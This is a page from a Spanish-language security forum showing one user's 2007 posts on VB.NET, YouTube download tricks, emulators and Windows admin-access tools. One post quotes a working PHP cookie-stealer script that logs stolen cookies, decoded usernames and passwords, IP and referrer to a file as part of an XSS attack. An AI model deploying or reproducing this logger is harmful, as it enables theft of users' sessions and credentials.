elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10
41  Programación / .NET (C#, VB.NET, ASP) / Re: Id de procesos [VB.NET] en: 12 Noviembre 2007, 20:30 pm
Gracias por responder, eso de los nombres ya lo hice, pero de ahí a lo de las IDs no encontre nada, me serviria de mucho que me dijeras cual es la funcion para sacar las ID, o el algoritmo
42  Programación / .NET (C#, VB.NET, ASP) / Id de procesos [VB.NET] en: 9 Noviembre 2007, 19:42 pm
Hola necesito ayuda con una funcion que devuelva las ids de procesos o algo parecido a la herramienta tasklist, para usarlo con la funcion AppAtivate, el codigo es este:
Código:
Dim ProcID as Integer
ProcID = CInt(TextBox1.Text)
AppActivate(ProcID)
My.Computer.Keyboard.SenKey(TextBox2.Text, True)
'Resto del codigo

Estoy aprendiendo y la verdad veo muy cutre que se tenga que escribir el ID del proceso (aunque tambien se puede escribir el titulo de la venta con una modificacion), lo que quisiera es que apareciera una pequeña lista en un listbox con los procesos y cuando se seleccione uno "ProcID" obtenga el valor de su ID, o tambien uno con los titulos de las ventanas, de paso si me ayudan con una funcion como el Sleep de VB6 porque a veces no envia las teclas si el cambio es muy rapido, espero y me ayuden
43  Informática / Tutoriales - Documentación / Re: Tutorial para descargar videos de YouTube manualmente en: 20 Octubre 2007, 18:41 pm
bien, muchachos hasta hace poco   ,,,,,,, pero si no se han dado cuenta ahora,,,,, haasta el mes de septiembre se podia bajar,,,,,,,,, pero ahora creo que han cambiado las direcciones o lo que sea ,, pero lo cierto es que por ese metodo ya no se pueden bajar,,,,,,,, un ejemplo , el video de peter schilling different story,,,,,,,,, solo como ejem,,,,,
en el primer paso esta igual vean
http://www.youtube.com/watch?v=8GUQJNblYqo
ahora el segundo paso

http://www.youtube.com/swf/cps.swf?video_id=8GUQJNblYqo&eurl=&iurl=http%3A//img.youtube.com/vi/8GUQJNblYqo/default.jpg&t=OEgsToPDskIzMXOpSz2ciuS-EJrBFdAm&rel=1&border=0
si se fijan donde se ponia el get_video  en lugar de cps.swf   habia algo asi como jpe.swf       esos si se podia bajar ,,, ahora estos , ya no........solo dice no se encontro la pagina ,,,,,,,,, veanlopor ud. mismos . ;D
si alguien sabe que paso , pues comuniquenlo,,,,,,,,,,,,,

saludos  ;D

Problema solucionado borra la parte del swf/ y sustituye cps.swf por get_video y listo, no fue facil de solucionar!!!, solo vasta tocar un poco el link ya lo probe y se aparecio el archivo de 9mb
44  Informática / Electrónica / Re: Como enchegar o apagar una luz de la habitacion con pc en: 18 Octubre 2007, 21:53 pm
Te suguiero qe hagas esa pregunta en unos 10 años porque ahora no sirve de nada intentar orientarte, bueno almenos que seas coeficiente intelectual de 75
45  Seguridad Informática / Nivel Web / Re: Tutorial Cookie Poisoning en: 19 Julio 2007, 20:44 pm
Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo...

Citar
<?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
46  Media / Juegos y Consolas / Re: Jugando a la Nintendo 64 <Juegos+Emulador> en: 26 Junio 2007, 21:01 pm
Código:
Todos

http://romhustler.net/roms/n64

Alguien sabe como hacer para que no se trabe el Zelda Majora Mask  cuando te pones la maskara de los gorones?
47  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Me presento. en: 25 Junio 2007, 22:43 pm
Sip.. es cierto. ^^ estas cosas se manejan por privado! =D

Así el rechazo es menos publico y penoso xD, como la pesadilla de ir al cole en calzoncillo
48  Seguridad Informática / Seguridad / Re: Entrar a XP/NT/2000 como administrador en 30 segundos en: 13 Junio 2007, 23:22 pm
hola amigos quisiera saber ¿como puedo crear una memoria usb bootable desde CIA Commander? ,
 o  solo puedo hacerlo con un disquette?
tambien quisiera saber como puedo hacerlo bootear desde el cd el cia comander  ;D

Lo que voy a decirte son especulacion porque no he tenido tiempo de probarlo.... el programa ULTRAISO tiene una opcion para crear una imagen de diskete, una para extraer la informacion de arranque de una ISO y otra para añadir informacion de arranque a una ISO. Con todo eso, creas la imagen del diskette, luego le extraes la informacion de arranque y por ultimo quemas un CD con esa informacion de arranque y listo. Para lo de la USB creo que tengo ahí una informacion de como hacerlo con la informacion de arranque pero no lo he leido :P
49  Informática / Tutoriales - Documentación / Re: Tutorial para descargar videos de YouTube manualmente en: 7 Junio 2007, 21:17 pm
2º. Fijarse en lo ultimo del link osea "watch?v=rer82PYJ3DA" y ahí borras el ? y el = y los sustitulles por / osea queda así "http://youtube.com/watch/v/rer82PYJ3DA" y le das a enter

Que es lo que no entiendes? eso de ? y = por / /. Esta bien claro. pon el link del video que quieres vajar y yo te pongo el link de descarga
50  Informática / Tutoriales - Documentación / Re: Tutorial para descargar videos de YouTube manualmente en: 4 Junio 2007, 21:41 pm
Algunos aprecian mí curiosidad  :xD no sabia que fuera tan facil como entrar en temporales... Si quieren borren este tonto post que no aporta nada interesante al foro  :-[
Páginas: 1 2 3 4 [5] 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines